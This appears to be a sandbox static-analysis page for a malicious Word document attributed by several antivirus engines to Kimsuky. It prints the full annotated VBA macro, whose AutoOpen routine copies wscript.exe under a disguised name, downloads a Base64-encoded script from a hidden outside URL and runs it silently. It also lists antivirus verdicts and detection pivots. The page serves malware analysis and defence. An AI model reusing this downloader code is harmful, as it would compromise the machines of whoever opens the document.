Static | ZeroBOX

Original


                                        ' Analyst note: only module attributes are listed for ThisDocument in this view;
                                        ' the executable macro code on this page is in the NewMacros module.
                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        ' Analyst note: the "deobfuscated" view of ThisDocument is identical to the original;
                                        ' it holds module attributes only, with no procedures to analyse.
                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

                                    

Original


                                        ' Analyst note: NewMacros is the module that carries the Base64 decoder and the
                                        ' AutoOpen entry point listed below.
                                        Attribute VB_Name = "NewMacros"



' Analyst note: hand-rolled Base64 decoder hidden behind a random-looking name.
' AutoOpen in this module calls it twice: once on the hard-coded URL literal and
' once on the HTTP response body before that body is written to disk.
'   base64String - text in the standard Base64 alphabet (A-Z a-z 0-9 + /).
'   Returns      - the decoded string, built with one Chr() per decoded byte.
' The return value is never assigned if a character outside the alphabet is hit.
Function kujgedrfgbasdfg(ByVal base64String)
' NOTE(review): error handling is switched to resume-next for the whole routine,
' so the Err.Raise further down should not propagate to the caller - confirm.
On Error Resume Next
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
     ' Strip CR/LF pairs, tabs and spaces so wrapped or indented input still decodes.
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     ' Walk the input four encoded characters at a time; each group yields up to 3 bytes.
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
               If thisChar = "=" Then
                    ' Padding: one output byte fewer, and the character contributes zero bits.
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    ' Alphabet position minus one gives the 6-bit value; -1 means "not found".
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
               If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
               ' Shift the accumulator by 6 bits and add the new value (24 bits per group).
               nGroup = 64 * nGroup + thisData
          Next
          ' Render the 24-bit group as six hex digits, then convert each digit pair to one character.
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          ' Keep only the bytes that did not come from "=" padding.
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     kujgedrfgbasdfg = sOut
End Function



' Analyst note: macro entry point. Word runs a macro named AutoOpen when the
' document is opened with macros enabled, so everything below executes without
' further user action. Observable stages, in order:
'   1. copy wscript.exe to %appdata%\word.exe (renamed script host; ATT&CK T1036.003)
'   2. HTTP GET to a Base64-hidden URL (ATT&CK T1105)
'   3. decode the response, write it to %USERPROFILE%\set.sl, run it as VBScript
'      through the renamed host (ATT&CK T1059.005)
'   4. recolour the document text and save the document
' Detection ideas grounded in the strings below: Office spawning cmd.exe, a
' "word.exe" under %appdata% whose original file name is wscript.exe, a set.sl
' file in the user profile, and the misspelled "Chnome" token in the User-Agent.
Sub AutoOpen()
' Every failure below is silently ignored; a failed step does not stop the later ones.
On Error Resume Next

    ' Stage 1: hidden cmd window copies the Windows Script Host binary under an Office-looking name.
    sCmdLine = "cmd /c copy %windir%\system32\wscript.exe %appdata%\word.exe"
    n = Shell(sCmdLine, vbHide)
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set WshShell = CreateObject("Wscript.shell")
    
    ' Stage 2: the literal decodes to hxxps://partner24[.]kr/mokozy/hope/kk[.]php (defanged).
    ' NOTE(review): the literal has a stray trailing "=" after 13 complete groups, so the
    ' decoder may append padding characters to the URL - confirm when extracting the IoC.
    drl = kujgedrfgbasdfg("aHR0cHM6Ly9wYXJ0bmVyMjQua3IvbW9rb3p5L2hvcGUva2sucGhw=")
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    ' Third argument False makes the request synchronous.
    WinHttpReq.Open "GET", drl, False
    ' Browser-like User-Agent; "Chnome" is misspelled, which makes it a usable network fingerprint.
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
    WinHttpReq.Send
    
    ' Stage 3 only runs when the server answers 200; any other status leaves no file on disk.
    If WinHttpReq.Status = 200 Then
    
        responseText = WinHttpReq.responseText
        
        ' The response body is treated as Base64 text; the decoded result is written to
        ' %USERPROFILE%\set.sl, overwriting any existing file (second argument True).
        strPath = WshShell.expandenvironmentstrings("%USERPROFILE%") & "\set.sl"
        Set File = FSO.CreateTextFile(strPath, True)
        File.Write (kujgedrfgbasdfg(responseText))
        File.Close
        
        ' The renamed wscript copy runs set.sl with the VBScript engine forced (//e:vbscript)
        ' in batch mode (//b), again from a hidden cmd window.
        sCmdLine = "cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl"
        n = Shell(sCmdLine, vbHide)
        
    End If
    ' Stage 4: sets all document text to black and saves, whether or not the download succeeded.
    ' NOTE(review): presumably reveals lure text that was unreadable before macros ran - the
    ' document body is not shown on this page, so confirm against the sample.
    ActiveDocument.Content.Font.ColorIndex = wdBlack
    ActiveDocument.Save
End Sub





                                    

Deobfuscated


                                        ' Analyst note: the "deobfuscated" view of NewMacros matches the original listing;
                                        ' the Base64 literal in AutoOpen is not decoded in this view.
                                        Attribute VB_Name = "NewMacros"



' Analyst note: hand-rolled Base64 decoder hidden behind a random-looking name.
' AutoOpen in this module calls it on the hard-coded URL literal and on the HTTP
' response body before that body is written to disk.
'   base64String - text in the standard Base64 alphabet (A-Z a-z 0-9 + /).
'   Returns      - the decoded string, built with one Chr() per decoded byte.
' The return value is never assigned if a character outside the alphabet is hit.
Function kujgedrfgbasdfg(ByVal base64String)
' NOTE(review): error handling is switched to resume-next for the whole routine,
' so the Err.Raise further down should not propagate to the caller - confirm.
On Error Resume Next
     Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     Dim dataLength, sOut, groupBegin
     ' Whitespace (CR/LF pairs, tabs, spaces) is removed before decoding.
     base64String = Replace(base64String, vbCrLf, "")
     base64String = Replace(base64String, vbTab, "")
     base64String = Replace(base64String, " ", "")
     dataLength = Len(base64String)
     ' One iteration per group of four encoded characters (up to three output bytes).
     For groupBegin = 1 To dataLength Step 4
          Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
          numDataBytes = 3
          nGroup = 0
          For CharCounter = 0 To 3
               thisChar = Mid(base64String, groupBegin + CharCounter, 1)
               If thisChar = "=" Then
                    ' "=" is padding: it lowers the byte count for this group and adds zero bits.
                    numDataBytes = numDataBytes - 1
                    thisData = 0
               Else
                    ' 6-bit value = position in the alphabet constant, zero-based; -1 if absent.
                    thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
               End If
               If thisData = -1 Then
                    Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                    Exit Function
               End If
               ' Accumulate four 6-bit values into one 24-bit number.
               nGroup = 64 * nGroup + thisData
          Next
          ' Zero-pad the hex form to six digits and turn each digit pair into one character.
          nGroup = Hex(nGroup)
          nGroup = String(6 - Len(nGroup), "0") & nGroup
          pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
                    Chr(CByte("&H" & Mid(nGroup, 5, 2)))
          ' Discard the characters that correspond to padding.
          sOut = sOut & Left(pOut, numDataBytes)
     Next
     kujgedrfgbasdfg = sOut
End Function



' Analyst note: macro entry point. Word runs a macro named AutoOpen when the
' document is opened with macros enabled. The routine is a downloader:
'   1. copies wscript.exe to %appdata%\word.exe (renamed script host; ATT&CK T1036.003)
'   2. fetches a Base64-encoded script over HTTPS (ATT&CK T1105)
'   3. writes the decoded script to %USERPROFILE%\set.sl and runs it as VBScript
'      through the renamed host (ATT&CK T1059.005)
'   4. recolours the document text and saves the document
' Hunting pivots visible in the strings below: Office spawning cmd.exe, a
' "word.exe" in %appdata% that is really wscript.exe, set.sl in the user profile,
' and the misspelled "Chnome" token in the User-Agent header.
Sub AutoOpen()
' Errors are suppressed for the whole routine, so a failed step does not halt the rest.
On Error Resume Next

    ' Stage 1: hidden cmd window stages a copy of the Windows Script Host under a new name.
    sCmdLine = "cmd /c copy %windir%\system32\wscript.exe %appdata%\word.exe"
    n = Shell(sCmdLine, vbHide)
    
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set WshShell = CreateObject("Wscript.shell")
    
    ' Stage 2: the literal decodes to hxxps://partner24[.]kr/mokozy/hope/kk[.]php (defanged).
    ' NOTE(review): a stray "=" follows 13 complete Base64 groups, so the decoded URL may
    ' carry trailing padding characters - confirm when extracting the IoC.
    drl = kujgedrfgbasdfg("aHR0cHM6Ly9wYXJ0bmVyMjQua3IvbW9rb3p5L2hvcGUva2sucGhw=")
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    ' Synchronous request (third argument False).
    WinHttpReq.Open "GET", drl, False
    ' Spoofed browser User-Agent; the "Chnome" typo is a stable string for proxy/IDS rules.
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
    WinHttpReq.Send
    
    ' Stage 3 is gated on HTTP 200; other responses leave no second-stage file behind.
    If WinHttpReq.Status = 200 Then
    
        responseText = WinHttpReq.responseText
        
        ' Decoded response goes to %USERPROFILE%\set.sl; an existing file is overwritten (True).
        strPath = WshShell.expandenvironmentstrings("%USERPROFILE%") & "\set.sl"
        Set File = FSO.CreateTextFile(strPath, True)
        File.Write (kujgedrfgbasdfg(responseText))
        File.Close
        
        ' The renamed wscript copy executes set.sl with the VBScript engine forced
        ' (//e:vbscript) and in batch mode (//b), from a hidden cmd window.
        sCmdLine = "cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl"
        n = Shell(sCmdLine, vbHide)
        
    End If
    ' Stage 4: runs regardless of the download result - text colour set to black, document saved.
    ' NOTE(review): presumably makes lure text readable once macros have run; the document
    ' body is not shown on this page, so confirm against the sample.
    ActiveDocument.Content.Font.ColorIndex = wdBlack
    ActiveDocument.Save
End Sub





                                    
[Content_Types].xml
L:Po0Cy
$SmDt_
_rels/.rels
word/_rels/document.xml.rels
X=c+(\
word/document.xml
'D<PE@
U-R$N&
aHR)8V"
word/vbaProject.bin
0.B(F(A(E(C
AQAR?R
vWa=:k
V8i2[@=
nDgB]LU
6B34A#
U0r?:r
4il}b;
-5LL,}
wD~vD!?;r
;HObRP
mK`w Y
`)kklj
N!bhYs
w",HzU
+ZI^iRy
^~-$#O
oNx,nE
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/theme/theme1.xml
_N?>}
zY(6i4[
word/vbaData.xml
word/settings.xml
O2fnfMI
!Bpq]WP+?
docProps/app.xml
jEuY,>
4^gxIf[
word/styles.xml
oNx,nE
]6S*OT
E!%'b}
=':=da
biDC{Hyy
'nB[ZB
Pz:1xa
docProps/core.xml
fO.1qF
HZ1.79z[-
K$#e%!G
word/fontTable.xml
ji1X8ox
<_i4+!
word/webSettings.xml
kP&"OI
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE Trojan.GenericKD.68409886
Sangfor Clean
K7AntiVirus Clean
Alibaba TrojanDownloader:Script/Kimsuky.ce514c70
K7GW Clean
Arcabit HEUR.VBA.Trojan.d
BitDefenderTheta Clean
Cyren PP97M/Agent.AFL.gen!Eldorado
Symantec CL.Downloader!gen175
ESET-NOD32 VBS/Kimsuky.P
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.68409886
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan Trojan.GenericKD.68409886
Tencent Trojan.MsOffice.MacroS.11009378
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
FireEye Trojan.GenericKD.68409886
Emsisoft Trojan.GenericKD.68409886 (B)
SentinelOne Static AI - Malicious OPENXML
Avast-Mobile Clean
Jiangmin WM/Downloader.a
Avira W2000M/NPE.Minerva.fmbdg
MAX malware (ai score=80)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Trojan:Win32/Leonem
ViRobot Clean
ZoneAlarm HEUR:Trojan-Downloader.MSOffice.SLoad.gen
GData Macro.Trojan.Agent.8D3DSM
Google Detected
AhnLab-V3 Downloader/DOC.Generic
Acronis suspicious
McAfee Clean
TACHYON Suspicious/WOX.XSR.Gen
VBA32 Clean
Zoner Clean
Rising Macro.Agent.cg (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.